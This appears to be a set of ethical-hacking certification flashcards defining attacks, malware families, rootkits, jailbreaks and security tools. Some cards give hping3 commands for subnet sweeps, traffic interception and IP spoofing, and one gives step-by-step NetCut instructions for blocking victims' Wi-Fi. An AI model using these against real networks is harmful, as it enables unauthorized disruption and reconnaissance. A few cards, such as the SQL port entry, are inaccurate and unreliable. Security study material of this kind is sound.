Rearranging letters in the plain text, according to a regular system produces the cipher text. For example, "CRYPTOGRAPHY" when encrypted becomes "AOYCRGPTYRHP." Examples include Rail Fence Cipher, Route cipher, and Myszkowski transposition.
DNS Amplification Attack
Recursive DNS Query is a method of requesting DNS mapping. The query goes through domain name servers recursively until it fails to find the specified domain name to IP address mapping. Attackers exploit recursive DNS queries to perform a this attack that results in DDoS attacks on the victim's DNS server After the primary DNS server finds the DNS mapping for the victim's request, it sends a DNS mapping response to the victim's IP address. This response goes to the victim as bots are using the victim's IP address. The replies to a large number of DNS mapping requests from the bots result in DDoS on the victim's DNS server.
System Baselining
Refers to tasking a snapshot of the system at the time the malware analysis begins The main purpose of system baselining is to identify significant changes from the baseline state System baseline includes details of file system, registry, open ports, network activity
nbstat -RR
Releases and reregisters all names with the name server.
Terminate and Stay Resident TSR Viruses
Remains permanently in the memory during the entire work session even after the target host's program is executed and terminated; can be removed only by rebooting the system Steps employed to infect files - Gets control of the system - Assigns a portion of memory for its code - Transfers and activates itself in the allocated portion of memory - Hooks the execution of code flow to itself - Starts replicating to infect files
Choosing to obtain Wi-Fi Cards
Requirements/ Consider o Determine the Wi-Fi requirements o Learn the capabilities of a wireless card o Determine the chipset of the Wi-Fi card o Verify the chipset capabilities o Determine the drivers and patches required
how to restrict anonymous access to SMB
RestrictNullAccess parameters found in Windows registry: KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
Network Reconnaissance
Reverse DNS lookups Reverse Ping OPENROWEST xp_cmdshell
Kernel Level Rootkit
Rootkit runs in Ring-0 with highest operating system privileges. These cover backdoors on the computer and are created by writing additional code or by substituting portions of kernel code with modified code via device drivers in Windows or loadable kernel modules in Linux.
TCP/UDP 5060, 5061
SIP, Session Initiation Protocol -a protocol used in the applications of Internet telephony for voice and video calls -It typically uses TCP/UDP port 5060 (non-encrypted signaling traffic) or 5061 (encrypted traffic with TLS) for SIP to servers and other end points. (5060 is for clear, 5061 is encrypted with TLS, video/voice calls)
IBM Security AppScan
SQL Injection Detection Tool enhances web application security and mobile application security, improves application security, and strengthens regulatory compliance. Features o Identifies and fixes vulnerabilities o Maximizes remediation efforts o Decreases the likelihood of attacks
hping3 -1 10.0.1.x --rand-dest -I eth0
Scan entire subnet for live host -1 10.0.1.x - all subnet --rand-dest it sends an ICMP-echo request randomly (--rand-dest) to all the hosts from 10.0.1.0-10.0.1.255 that are connected to the interface eth0. The hosts whose ports are open will respond with an ICMP reply. In this case, you haven't set a port, so Hping sends packets to port 0 on all IP addresses by default.
GFI LanGuard
Scans, detects, assesses and rectifies vulns It scans your operating systems, virtual environments and installed applications through vulnerability check databases. It enables you to analyze the state of your network security, identify risks and address how to take action before it is compromised. Features: Patch management for operating systems and third-party applications Vulnerability assessment Web reporting console Track latest vulnerabilities and missing updates Integration with security applications Network device vulnerability checks
Footprinting Top-Level Domains (TLDs) & Sub-domains
Search for company's external url :Google, Bing,Sub-domains provide insight into internal departments Sub-domains can be found by trial and error or by using netcraft or Sublist3r (python script that enumerates sub-domains across multiple sources at once.
SPAN Port
Switched Port Analyzer (SPAN) is a Cisco switch feature, also known as "port mirroring," that monitors network traffic on one or more ports on the switch. Configured to receive a copy of every pkt that passes through a switch, making it prime real estate for an attacker (plus it's behind the Firewall)
Footprinting thru Search Engines
Tech platforms, employee info, login pages, intranet portals etc. Helps perform social engineering and other types of attacks. Major search engines -Google, Bing, Yahoo, Ask, Aol, Baidu Duck Duck Go, et al Attackers can use advanced search operators available with these engines to create complex queries to find, filter, and sort specific info regarding the target.
Classification of Stego
Technical steganography - hides a message using scientific methods linguistic steganography - hides it in a carrier - \
MAC Spoofing Attack Tools
Technitium MAC Address Changer Change MAC Address GhostMAC Spoof-Me-Now SpoofMAC Win7 MAC Address Changer SMAC
Automated Vuln Detection Sys (AVDS)
Tests every node according to its characteristics and records system responses to reveal security issues
Detecting Stego
Text file- patterns, alterations, etc Image file- size/format/timestamp changes Audio file- freq scan, distortion, patterns, LSB mod Video file- combine methods of audio/image pg 207
BSSID (basic service set identifier)
The MAC address of an access point (AP) or base station that has set up a Basic Service Set (BSS)
Virtualization
The ability to run multiple operating systems on a single physical system and share the underlying resources such as a server, a storage device or a network.
Components of IoT : Remote Control using Mobile App
The end user uses remote controls such as mobile phones, tabs, laptops, etc. installed with a mobile app to monitor, control, retrieve data, and take a specific action on IoT devices from a remote location.
Subnet scanning technique
The infected machine looks for new vulnerable machines in its local network, behind the firewall using the information hidden in the local addresses. Attackers use this technique in combination with other scanning mechanisms.
Vulnerability Research
The race against attackers to find your weaknesses. Classified based on Severity Level (L,M,H) and Exploit Range (local vs remote) To gather information about security trends, threats, and attacks To find weaknesses, and alert the network administrator before a network attack To get information that helps prevent the security problems To know how to recover from a network attack
Vulnerability Research
The race against attackers to find your weaknesses. Classified based on Severity Level (L,M,H) and Exploit Range (local vs remote) pg 142
WannaCry
Tool- ransomware that on execution encrypts the files and locks the user's system, leaving the system in an unusable state. The compromised user has to pay ransom in bitcoins to the attacker to unlock the system and get the files decrypted.
Brute Force Attack
Tries every combination of characters (active online attack) -Also known as" Exhaustive key-search,is the basic technique for trying every possible key in turn until the correct key is identified." -Cryptanalysis is a brute-force attack on an encryption employing a search of the keyspace. In other words, testing all possible keys is one of the attempts to recover the plaintext used to produce a particular ciphertext. The detection of a key or plaintext that is faster than a brute force attack is one way of breaking the cipher.
GSM (Global System for Mobile Communications)
Universal system used for mobile transportation for wireless network worldwide.
LLMNR/NBT-NS
Used to identify a host when DNS fails to do so. Sends a broadcast message to all machines on network looking for the site. Hacker can intercept and say " I know where it is send me the hash" Then take it off line and crack. LLMNR(Link Local Multicast Name Resolution/NBT-NS (NetBios Name Service) Uses NTLM/NTLMv2 (Easily hacked)
Types of Jailbreaking
Userland Exploit iBoot Exploit Bootrom Exploit
They do not use host system resources.
What is the main advantage that a network-based IDS/IPS system has over a host-based solution? -They do not use host system resources. -They are easier to install and configure. -They will not interfere with user interfaces. -They are placed at the boundary, allowing them to inspect all traffic.
Address Resolution Protocol (ARP)
a stateless TCP/IP protocol that maps IP network addresses to the Mac (hardware addresses) used by a data link protocol. Using this protocol, a user can easily obtain the MAC address of any device on a network. Apart from the switch, the host machines also use the ARP protocol for obtaining MAC addresses. used by the host machine when a machine wants to send a packet to another device where it has to mention the destination MAC address in the packet sent.
Mole
an automatic SQL injection exploitation tool. uses a command-based interface, allowing the user to indicate the action he wants to perform easily. The CLI also provides auto completion on both commands and command arguments, making the user type as less as possible Features o Supports MySQL, Postgres, SQL Server, and Oracle o Automatic SQL injection exploitation using union technique o Automatic blind SQL injection exploitation o Exploits SQL injection in GET/POST/Cookie parameters
Retina CS
content-aware vuln assessment & risk analysis A vulnerability management software solution designed to provide organizations with context-aware vulnerability assessment and risk analysis. -result-oriented architecture works with users to proactively identify security exposures, analyze business impact, and plan and conduct remediation across disparate and heterogeneous infrastructure Enterprise Vulnerability Management software enables you to: Discover network, web, mobile, cloud, virtual and IoT infrastructure Profile asset configuration and risk potential Pinpoint vulnerabilities, malware and attacks Analyze threat potential and return on remediation Remediate vulnerabilities via integrated patch management (optional) Report on vulnerabilities, compliance, benchmarks, etc. Protect endpoints against client-side attacks
what is SMTP RCPT
defines recipients of messages
Destructive Trojans
delete files, corrupt OS, format files an drives, and perform massive destructive that can crash operating systems These Trojans disable the security systems like firewall, anti-virus on the target machine before persforming the attack Shamoon is one of the latest Trojan which used a Disttrack payload that is configured to wipe the system as well as virtual desktop interface snapshot
Network Management
dialog box aids in the discovery of the network speed the DNA uses and each work-unit length of the DNA client. The user can monitor the job status queue and the DNA. After collecting the data from this dialog box, the user can modify the client work. When the size of the work-unit length increases, the speed of the network traffic decreases. Decrease in the speed of the traffic leads the client working on the jobs to spend longer amounts of time. Therefore, the user can make fewer requests to the server because of the reduction in bandwidth of network traffic
Browser-Based Point of Attack : Phishing
emails or pop-ups redirect users to fake web pages of mimicking trustworthy sites that ask them to submit their personal information such as usernames, passwords, credit card details, address, and mobile number
Plist (property list) modification
files include all the necessary information that is needed to configure applications and services These files describe when programs should execute, executable file path, program parameters, essential OS permissions,
hping3 -S 72.14.207.99 -p 80 -- tcp-timestamp
firewall and timestamps --tcp-timestamp - (Many firewalls drop those TCP packets that do not have the TCP Timestamp option set. By adding the --tcp-timestamp argument in the command line, -you can enable the TCP timestamp option in Hping and try to guess the timestamp update frequency and uptime of the target host (72.14.207.99).
Another name for stealth scan
half open or SYN can
NetBIOS code: 00
host name or domain name, can be unique or group
hping3 -9 HTTP -I eth0
intercept all HTTP traffic -9 - listen -intercepts all the packets containing HTTP signature, and dump from signature end to the packet's end.
Passive Reconnaissance
is a hacker's attempt to scout for our survey potential targets and then investigate the target using publicly available information.
Detectinng Layer 4 tar Pit
like Labrea can be identified by the attacker by analyzing the TCP window size, where tar pit continuously acknowledge incoming packets even though the TCP window size is reduced to zero
SNMP: getrequest
manager requests info from the SNMP agent -used to send request
ICMP Echo Scanning
not the same as port scanning because it does not have a port abstraction. - It is used to determine the particular hosts that are active in a network by pinging all of them.
Used to Launch Wireless Attacks
o Aircrack-ng Suite
How to Defend Against Wireless Attacks
o Configuration Best Practices o SSID Settings Best Practices o Authentication Best Practices
Types of integrity attacks
o Data Frame Injection o WEP Injection o Bit-Flipping Attacks o Extensible AP Replay o Data Replay o Initialization Vector Replay Attacks o RADIUS Replay o Wireless Network Viruses
Cryptanalysis methods
o Linear o Differential o Integral
IoT Security Tools
o SeaCat.io o DigiCert o Pulse: IoT Security Platform o Symantec IoT Security o darktarce o Cisco IoT Threat Defense o Cisco Umbrella o Google Cloud IoT o net-Shield o Noddos o AWS IoT Device Defender o Norton Core
Modern Cipher- Key
o Symmetric key algorithms (*Private-key* cryptography): Uses same key for encryption and decryption. o Asymmetric key algorithms (*Public-key* cryptography): Uses two different keys for encryption and decryption
Vulnerability Scanner
o beSTORM o Rapid7 Metaspoilt PRO o IoTsploit o IoTSeeker o Bitdefender Home Scanner o IoTInspecto
Banner Grabbing
or "OS fingerprinting," is a method used to determine the operating system that is running on a remote target system. An attacker uses this technique to identify network hosts running versions of applications and OSs with known exploits.
what is a PBX?
private box exchange, business telephone network that uses LAN or WAN instead of PSTN circuit switches
Footprinting Tools: OSRFramework
provide a collection of scripts that can enumerate users, domains, and more across over 200 separate service -username checking, DNS lookups, deep web search and more tools included in this -usufy.py, -mailfy.py, -searchfy.py, -domainfy.py, -phonefy.py
what is ntpupdate?
queries NTP server and has a bunch of switches
Application level rootkit
rootkit operates inside the victim's computer by replacing the standard application files
Rootkits
software programs aimed to gain access to a computer without detection. Programs that hide their presence & activity while giving attacker FULL access to svr or host. Access is persistent (survives reboot).
what is SPIT
spamming over internet telephony
Displays all retransmissions in the trace
tcp.analysis. retransmission
Availability
the assurance that the systems responsible for delivering, storing, and processing information are accessible when required by authorized users.
Substitution Stenography
the attacker tries to encode secret information by substituting the insignificant bits with the secret messag
Vulnerability Assessment: Tree-Based
the auditor selects different strategies for each machine or component of the information system only need to be doe by admin ounce. Basically each step is decided by an admin
Vulnerability
the existence of weakness, design, or an implementation error that, when exploited, leads to an unexpected and undesirable event compromising the security of the system
SNMP enumeration
the process of creating a list of the user's accounts and devices on a target computer using SNMP. Attackers this enumerate to extract information about network resources such as hosts, routers, devices, shares, etc., and network information such as ARP tables, routing tables, device specific information, and traffic statistics.
Enumeration
the process of extracting user names, machine names, network resources, shares, and services from a system or network. ALoows you to collect Network resources, Network shares, Routing tables, Audit and service settings, SNMP and FQDN details, Machine names, Users and groups, Applications and banners
Web Application Fuzz Testing
this is a black box testing method. It is a quality checking and assurance technique used to identify coding errors and security loopholes in web applications. Huge amounts of random data called 'Fuzz' will be generated by the fuzz testing tools (Fuzzers) and used against the target web application to discover vulnerabilities that can be exploited by various attacks
Companion/ Camouflage Viruses
virus stores itself by having the identical file name as the targeted program file. The virus infects the computer upon executing the file, and it modifies the hard disk data. Creates a companion file for each executable file the virus infects A companion virus may save itself as notepad.com and every time a user executes notepad.exe, the computer will load notepad.com and infect the system It is easy to detect just by the presence of the extra COM file in the system.
Library level rootkit
work higher up in the OS and they usually patch, hook, or supplant system calls with backdoor versions to keep the attacker unknown. They replace original system calls with fake ones to hide information about the attacker
Mobile IDSs
zIPS Wifi Inspector Wifi Intruder Detector Pro
Prudent Policy
-policy starts with all the services blocked. -The administrator enables safe and necessary services individually. -It logs everything, such as system and network activities. It provides maximum security while allowing only known but necessary dangers.
Metamorphic Viruses
-rewrite themselves completely each time they are to infect a new executable -This code can reprogram itself by translating its own code into a temporary representation and then back to the normal code again This technique is more effective in comparison to polymorphic code. Techniques used for thiis virus - Disassembler - Expander - Permutator - Assembler common viruses - Zmist - inserts itself into other code, regenerates the code, and rebuilds the executable , known as zombie -Win32/Simile- assembly language to target Microsoft Windows • Inserts dead code • Reorders instructions • Reshapes the expressions • Modifies program control structure
nmap XMAS scan flag
-sX
Multiping
A tool used to find IP address of any IoT device in the target network. After obtaining the IP address of an IoT device, the attacker can perform further scanning to identify vulnerabilities present in that device.
Intelligence-based warfare
a sensor-based technology that directly corrupts technological systems. -According to Libicki, it is a warfare that consists of the design, protection, and denial of systems that seek sufficient knowledge to dominate the battle space
Enterprise Information Security Architecture (EISA)
a set of requirements, processes, principles, and models that determine the current and/or future structure and behavior of an organization's security processes, information security systems, personnel, and organizational sub-units.' It ensures that the security architecture and controls are in alignment with the organization's core goals and strategic direction
Short-range Wireless Communication
o Bluetooth low energy o Light-fidelity LiFi o Near Field Communication o QR Codes and Barcodes o Radio Frequency Identification o Thread o Wifi o Wifi Direct o z-wave o ZigBee
Bluetooth Hacking
o Blusmacking o Bluejacking o Blue Snarfing o BlueSniff o Bluebugging o BluePrinting o MAC spoofing Attack o MITM/Impersonation Attack
Code Breaking Methologies
o Brute Force o Frequency Analysis - the study of the frequency of letters or groups of letters in a ciphertext. o Trickery and Deceit - It involves the use of social engineering techniques to extract cryptography keys. o One-Time pad - s mostly a non-repeating set of letters or numbers, which the system chooses randomly. The user writes them on small sheets of paper and then pastes them together in a pad
WEP Issues
o CRC-32 is not sufficient to ensure complete cryptographic integrity of a packet o IVs are 24 bits: An AP broadcasting 1500-byte packets at 11 Mb/s would exhaust the entire IV Space in five hours. o Known plaintext attacks - Dictonary attacks o Dos o A lack of centralized key management makes it difficult to change WEP keys with any regularity o Does not dictate that each packet must have a unique IV o Use of RC4 was designed to be a one-time cipher and not intended for multiple message use
Things that lead to Insider Threats
o Privileged Users o Disgruntled Employees - unhappy employees or contract workers o Terminated Employees o Accident-Prone Employees o Third Parties - remote employees, partners, dealers, vendors, o Undertrained Staff
Vulnerability Assessment Solutions
o Product-based solutions o Service-based solutions o Tree-based assessment o Inference-based assessment
Cloud Deployment Models
o Public Cloud - rendered over network that is open for public use o Private Cloud - operates solely for a single organization o Community Cloud - shared infrastructure between several organizations from a specific community with common concerns o Hybrid Cloud - composition of two or more clouds that remain unique entities but are bound together, offering the benefits of multiple deployment models
Android Trojans
o GhostCtrl malware o Triada o AndroRAT o ZitMo (ZeuS-in-the-Mobile) o FakeToken o TRAMP.A o Fakedefender o Obad o FakeInst o OpFake o Dendroid
Daisy Chaining:
It involves gaining access to one network and/or computer and then using the same information to gain access to multiple networks and computers that contain desirable information
SQL Port
150 and 156
RC4
A variable key-size symmetric-key stream cipher Byte-oriented operations-random permutation the period of the cipher is likely to be greater than 10,100 output byte uses eight to sixteen system operations - cipher has the ability to run fast when used in software Used for file encryption but ideal for software implementation enables safe communications such as traffic encryption (which secures Web sites) and for Web sites that use the SSL protocol.
Google Hacking DB (GHDB)
Authoritative source for querying Google. The Exploit DB is a Common Vulnerabilities & Exploits (CVE) compliant archive. You can also footprint, VoIP and VPN here
Browser-Based Point of Attack : Man in the middle mobile
Attacker implants malicious code into the victim's mobile device to bypass password verification systems that send one-time passwords (OTPs) via Short Message Service (SMS) or voice calls.
OWASP A4: XML External Entity (XXE)
External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and denial of service attacks, such as the Billion Laughs attac Server-side request forgery (SSRF) attack
Port is open
In ACK flag probe scanning, if the TTL of RST is Less than 64 what does it mean?
The System Point of Attack : Carrier-loaded Software
Pre-installed software or apps on devices may contain vulnerabilities that an attacker can exploit to perform malicious activities such as delete, modify, or steal data on the device, eavesdrop on calls, and others.
IP Address Spoofing
The attacker changes source IP addresses so that the attack appears to be coming in as someone else. -it goes back to the spoofed address and not to the attacker's real address. Attackers mostly use IP address spoofing to perform DoS attacks -When spoofing a nonexistent address, the target replies to a nonexistent system, Hping3: Hping3 www.certifiedhacker.com -a 7.7.7.7
Virus Detection Methods
Scanning Integrity Checking Interception Code Emulation Heuristic Analysis
IDS Tools
Snort TippingPoint AllenVault OSSIM
Window size
TCP flow method can be used as a counter measure for IP spoofing. What packet component does it use?
Session Hijacking Detection Tools
Wireshark LogRhythm
Cloud: Database Attacks
o SQL injection o Privilege escalation o Data dumping o OS command execution
Mobile Anti-Spyware
-Malwarebytes anti-malware mobile tool is a protection against malware, ransomware, and other growing threats to Android devices. Features: o Detects and removes adware and malware o Blocks malware and ransomware automatically o Conducts privacy audit for all apps o Safer browsing - AntiSpy Mobile - FREE Spyware & Malware Remover - D-Vasive Anti-Spy - SpyWare Removal
Vulnerability Assessment Types
1. Active- network scanner 2. Passive- sniffer 3. External- from internet 4. Internal- intranet 5. Host-based 6. Network 7. App- testing web infrastructure 8. Wireless network pg 143
Pre-Assessment Phase: Creating a Baseline
1. ID & understand business processes 2. ID supporting apps, data & services 3. Asset inventory & prioritization 4. Map network 5. ID controls already in place 6. Understand policy implementation & standards compliance 7. Define scope of assessment 8. Create info protection procedures pg 144
Vulnerability Classification
1. Misconfig 2. Default installations 3. Buffer overflows - common software vulnerabilities that happen due to coding errors allowing attackers to get access to the target system. 4. Unpatched svr 5. Design flaws -incorrect encryption or poor validation of data, refer to logical flaws in the functionality of the system that is exploited by the attackers to bypass the detection mechanism and acquire access to a secure system. 6. OS flaws 7. App flaws 8. Open svc 9. Default pwd pg 142
OWASP Top 10 Mobile Risks 2016
1. improper platform usage This category covers misuse of a platform feature or failure to use platform security controls. 2. insecure data storage This category covers misuse of a platform feature or failure to use platform security controls. 3. insecure communication This covers poor handshaking, incorrect SSL versions, weak negotiation, cleartext communication of sensitive assets, and so on 4. insecure authentication This category captures notions of authenticating the end user or bad session management 5. insufficient cryptography This category is for issues where cryptography was attempted, but it was not done correctly. 6. insecure authorization This is a category to capture any failures in authorization (e.g., authorization decisions in the client side, and forced browsing) 7. client code quality This is the "Security Decisions Via Untrusted Inputs," one of our lesser-used categories. This would be the catch-all for code-level implementation problems in the mobile client, which is distinct from server-side coding mistakes. 8. code tampering This category covers binary patching, local resource modification, method hooking, method swizzling, and dynamic memory modification. 9. reverse engineering This category includes analysis of the final core binary to determine its source code, libraries, algorithms, and other assets. 10. extraneous functionality Often, developers include hidden backdoor functionality or other internal development security controls that are not intended to be released into a production environment
Android Trojans: BankBot
A banking Trojan that is comprised of sophisticated techniques is code obfuscation, payload dropping, and infection mechanism affecting android accessibility service This Trojan spreads by Jewel Star Classic android game application and after installing the app, the user will be tricked to enable malicious service and enter the credit card details.
App sandboxing
A security mechanism that helps protect systems and users by limiting resources the app can access to its intended functionality on the mobile platform. Often, useful in executing untested code or untrusted programs from unverified third parties, suppliers, untrusted users, and untrusted websites
Pangu Anzhuang
A simple application that allows you to install jailbreak apps for iOS 11.2.1 - iOS 10.2 versions. It is a No PC required jailbreak method. It is an online jailbreaking app installer for latest iOS versions. Anzhuang helps you to install jailbreak apps using the dev code extraction method. Specializes is that it perfectly works with all 64-bit and 32-bit devices. It allows you to install Cydia and popular Jailbreak apps to your latest iOS versions from developer code extraction method
Android Trojans: SpyDealer
A spying Trojan that ex-filtrates the private and sensitive data from 40 adroid applciations including WeChat, Facebook, WhatsApp, Skype, Line, Viber, QQ, Tango, Telegram, Sina Weibo, Tencent Weibo It employees exploits from a commercial rooting app Baidu Easy Root to gain root privilege It abuses the Android Accessibility Service feature It extracts info like phone number, IMEI, IMSI, SMS, MMS, contacts, accounts, phone call history, location, and connected wifi info.
The Network point of attack : SSLStrip
A type of MITM attack in which attackers exploit vulnerabilities in the SSL/TLS implementation on websites. It relies on the user validating the presence of the HTTPS connection. The attack invisibly downgrades connections to HTTP, without encryption,
Phone/SMS based Point of Attack: SMiShing or SMS phishing
A type of phishing fraud in which an attacker utilizes SMS to send text messages to a victim that contains a deceptive link of a malicious website or a telephone number.
Browser-Based Point of Attackk : Clickjacking
Also known as a user interface redress attack, is a malicious technique used to trick web users to click something different from what they think they are clicking.
zANTI
An android application which allows you to perform following attacks: o Spoof MAC address o Create malicious wifi hotspot o Scan for open ports o Exploit router vulnerabilities o Password complexity audits o Man in the middle attack o DoS attack o Hijack sessions
Untethered Jailbreaking
An untethered jailbreak has the property that if the user turns the device off and back on, the device will start up completely, and the kernel will be patched without the help of a computer—in other words, it will be jailbroken after each reboot.
Application-based Point of Attack : Escalated Privileges:
Attackers engage in privilege escalation attacks, which take advantage of design flaws, programming errors, bugs, or configuration oversights to gain access to resources usually protected from an application or user.
Phone/SMS based Point of Attack: Baseband Attacks
Attackers exploit vulnerabilities resident in a phone's GSM/3GPP baseband processor, which sends and receives radio signals to cell towers.
Pairing Mobile Devices on Open Bluetooth and Wi-Fi Connections
Attackers use this to their advantage to exploit and infect a mobile device with malware such as viruses and Trojans, or compromise unencrypted data being transmitted across untrusted networks o Bluesnarfing (Stealing Information via Bluetooth) o Bluebugging (Taking Over a device via Bluetooth
Web server-based attack : Cross site request forgery
CSRF attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send unintended malicious requests. The victim holds an active session with a trusted site and simultaneously visits a malicious site that injects an HTTP request for the trusted site into the victim's session, compromising its integrity.
Jailbreaking iOS
Defined as the process of installing a modified set of kernel patches that allows users to run third-party applications not signed by the OS vendor Jailbreaking provides root access to the operating system and permits downloading of third-party applications, themes, extensions on iOS devices Jailbreaking removes sandbox restrictions, which enables malicious apps to access restricted mobile resources and info
Android Device Tracking Tools
Find My Phone - anti-theft, device recovery app for Android that helps you find your lost, stolen, misplaced mobile phone or tablet. Where's My Droid - device tracking tool that allows you to track your phone from anywhere, either with a text messaged attention word or through the online control center known as Commander. o Prey Anti-Theft: Find My Android and Mobile Security o iHound o Mobile Tracker for Android o Tech Expert o GadgetTrak Mobile Security o My Device o Lost Android
Browser-Based Point of Attack : Framing
Involves a web page integrated into another web page using iFrame elements of HTML
Network Spoofer
Lets you change websites on other people's computers from an Android phone Features: o Flip pictures upside down o Flip text upside down o Make websites experience gravity o Redirect websites to other pages o Delete random words word from websites o Replace words on websites with others o Change all pictures to Trollface oWobble all pictures/ graphics around a bit
Application-based Point of Attack: Unintended Permissions
Misconfigured apps can at times open doors to attackers by providing unintended permissions.
Kaspersky Mobile Antivirus
Mobile antivirus is an Android security app focusing on anti-theft and virus protection for mobile and tablet devices. It is designed to help users find their device, step-by-step, in case if it is lost or stolen. It also protects the device against virus or malware attacks. Features o Antivirus protection o Background check o App Lock o Find my phone o Anti-Theft o Anti-Phishing o Call blocker o Web filter o Android 8 Support o Antivirus Database Expansion
Low Orbit Ion Cannon LOIC
Mobile application that allows the attacker to *perform DoS/ DDoS attacks* on the target IP address. This application can perform UDP, HTTP or TCP flood attacks Features: o Full control over traffic flow o Send data pcket to any IP address o Various methods to send data packets o Retrieve IP address from any real web-address o Send data packets to any port
Mobile Device Management (MDM)
Provides platforms for over the air or wired distribution of applications, data and configuration setting for all types of mobile devices, including mobile phones, smartphones, tablet computers MDM helps in implementing enterprise-wide policies to reduce support costs, business discontinuity, and security risks It hlpes system administrators to deploy and manage software applocations across all enterprise mobile devices to secure, monitor, manage, and supports mobile devices
Orbot Proxy
Proxy app that empowers other apps to use the internet more privately It uses Tor to encrypt your internet traffic and then hides it by bouncing through a series of computers around the world Attackers can use this application to hide their identity while performing attacks or surfing through the target web applications
DroidSheep
Simple Android tool for web *session hijacking*. It listens for HTTP packets sent via a wireless network connection and extracts the session IDs from these packets in order to reuse them. o It can capture sessions using the libpcap library and supports: OPEN Networks, WEP encrypted networks, WPA and WPA2 encrypted networks o ("sidejacking"), using libpcap and arpspoof.
The System Point of Attack : Jailbreaking iOS
The process of removing security mechanisms set by Apple to prevent malicious code from running on the device. It provides root access to the OS and removes sandbox restrictions.
Semi-tethered Jailbreaking
This jailbreak has the property that if the user turns the device off and back on, the device will start up completely, it will no longer have a patched kernel, but it will still be usable for normal functions. To use jailbroken addons, the user need to start the device with the help of the jailbreaking tool.
Jailbreaking - iBoot Exploit
This type of exploit can be semi-tethered if the device has a new bootrom. An iboot jailbreak allows user-level access and iboot-level access. This exploit takes advantage of a loophole in iBoot (iDevice's third bootloader) to delink the code-signing appliance. Firmware updates can patch these types of exploits
Jailbreaking - Userland Exploit
Uses a loophole in the system application. It allows user-level access but does not allow iboot-level access. You cannot secure iOS devices against this exploit, as nothing can cause a recovery mode loop. Only firmware updates can patch these types of vulnerabilities
NetCut
Wifi killing application that allows the attackers to identify the target devices and *block the access of WiFi* to the victim devices in a network. Block wifi access: 1. download and install NetCut android application on your device 2. launch the NetCut app in the mobile 3. after opening, it automatically scans for all the devices accessing the wifi network and displays the list under CUT tab on the interface 4 identify the target device and tap on it to block the wifi access to the device. The wifi propagation symbol on the left of the blocked device name turns red from blue. You can confirm this by nabigating to the JAIL tab on the interface, where the list of blocked devices will be displayed.
Tethered Jailbreaking
With this jailbreak, if the device starts up on its own, it will no longer have a patched kernel, and it may get stuck in a partially started state; in order for it to start completely and with a patched kernel, it essentially must be "re-jailbroken" with a computer (using the "boot tethered" feature of a jailbreaking tool) each time it is turned on.
Web server-based attack: Cross site scripting
XSS attacks exploit vulnerabilities in dynamically generated web pages, which enable malicious attackers to inject client-side script into web pages viewed by other users. It occurs when invalidated input data is included in dynamic content sent to the user's web browser for rendering.
Mobile Spyware : mSpy
mSpy is a mobile monitoring and spying application which runs on the target device to log all activities including call log history, GPS location, calendar updates, text messages, emails, web history, instant messenger chats, keystrokes, and so on and also can control applications. This product is useful to monitor versatile online/offline actions of employees and underage children. Features: o Monitor Internet Use (Browsing History, Website Bookmarks, Blocking Websites, Wi-Fi Networks, Keyword alerts) o Access Calendar and Address Book (Calendar Activities, Contacts) o Read Instant Messages (Skype, WhatsApp, iMessage, Social Network, Viber, Snapchat, LINE, Telegram, Tinder) o Control Apps and Programs (Installed Applications, Application blocking, Keylogger) o View Multimedia Files (Photos, Videos) o Remote Control (Device Wipeout, Locked Device, Additional Device Info, Control Panel)
iOS Trojans
o AceDeceiver -capable of conducting MITM attacks on any iPhone and is not limited to jailbroken devices - exploits design flaws in Apple's DROM mechanism o Spy/ MobileSpy! iPhoneOS -This malware allows an attacker to eavesdrop all incoming and outgoing calls, SMS, URLs and GPS position are logged to a remote server on the infected iOS device o DualToy Trojan o KeyRaider o XcodeGhost o AdThief/Spad o Trapsms o iKeyGuard o PawnStorm.B o WireLurker o Ikee/Eeki
Android Security Tools
o Avira Antivirus Security o Avast Antivirus & Security o McAfee Mobile Security & Lock o Lookout Security & Antivirus o Sophos Mobile Security o Malwarebytes for Android o AVG AntiVirus FREE for Android Security 2017 o TrustGo Mobile Security o 360 Security -Free Antivirus,Booster,Space Cleaner o Trend Micro Mobile Security & Antivirus o DroidSheep Guard oBull Guard Mobile Security o AVL Pro
iOS Devie Security Tools
o Avira Mobile Security -provides features such as web protection, identity safeguarding, identifies Phishing websites that target you personally, securing emails, tracking your device, identifying activities, organizing device memory, and backing up all your contacts, and so on for all iOS devices. o Norton Mobile Security o LastPass Password Manager o Lookout for iOS o SplashID Safe Password o Webrrot SecureWeb Browser o Wicker Me
Layers of Apple iOS
o Cocoa Touch: -This layer contains key frameworks that help in building iOS apps. These frameworks define the appearance of app, offers basic app infrastructure, and supports key technologies such as multitasking, touch-based input, push notifications, and many high-level system services. o Media: -This layer contains the graphics, audio, and video technologies that enable multimedia experiences in apps. o Core Services: -This layer contains fundamental system services for apps. Key among these services are Core Foundation and Foundation frameworks (defines the basic types that all apps use). Individual technologies that support features such as social media, iCloud, location, and networking belong to this layer. o Core OS: -This layer contains low-level features on which most other technologies are built. Frameworks in this layer are useful when dealing explicitly with security or communicating with an external hardware accessory.
Application Framework blocks
o Content Providers—Manages data sharing between applications. o View System—For developing lists, grids, text boxes, buttons, and so on. o Activity Manager—Controls the activity life cycle of applications. o Location Manager—Manages location, using GPS or cell towers. o Package Manager—Keeps track of the applications installed on the device. o Notification Manager—Helps applications display custom messages in a status bar. o Resource Manager—Manages various types of resources used. o Telephony Manager—Manages all voice calls. o Window Manager—Manages application windows.
(Bring Your Own Device) BYOD Policy Implementation
o Define your requirement o Select the devices of your choice and build a technology portfolio o Develop policies o Security o Support
iOS Device Tracking Tools
o Find My iPhone -allows you to use another iOS device to track a lost or misplaced mobile, iPhone, iPad, iPod touch, or Mac and protects its data. o Phonty o SpyBubble o GadgetTrak o iLocalis o GPS Tacker by FollowMee o iHound
(Bring Your Own Device) BYOD Benefits
o Increased productivity: o Employee satisfaction: o Lower Cost o Work Flexibility
Hping ICMP mode
-1
LAN-to-LAN wireless
APs provide wireless connectivity to local computers, and local computers on different networks can be interconnected. All hardware APs have the capability to interconnect with other hardware APs. complex task
The System Point of Attack : User-initiated Code:
An activity that tricks the victim to install malicious applications or clicking links where an attacker can install malicious code to exploit a user's browser, cookies, and security permissions.
Filter specific commands, such as http:post
An advantage of an application-level firewall is the ability to -Retain state information for each packet -Filter packets at the network level -Monitor TCP handshaking -Filter specific commands, such as http:post
Dynamic Malware Analysis - Port Monitoring
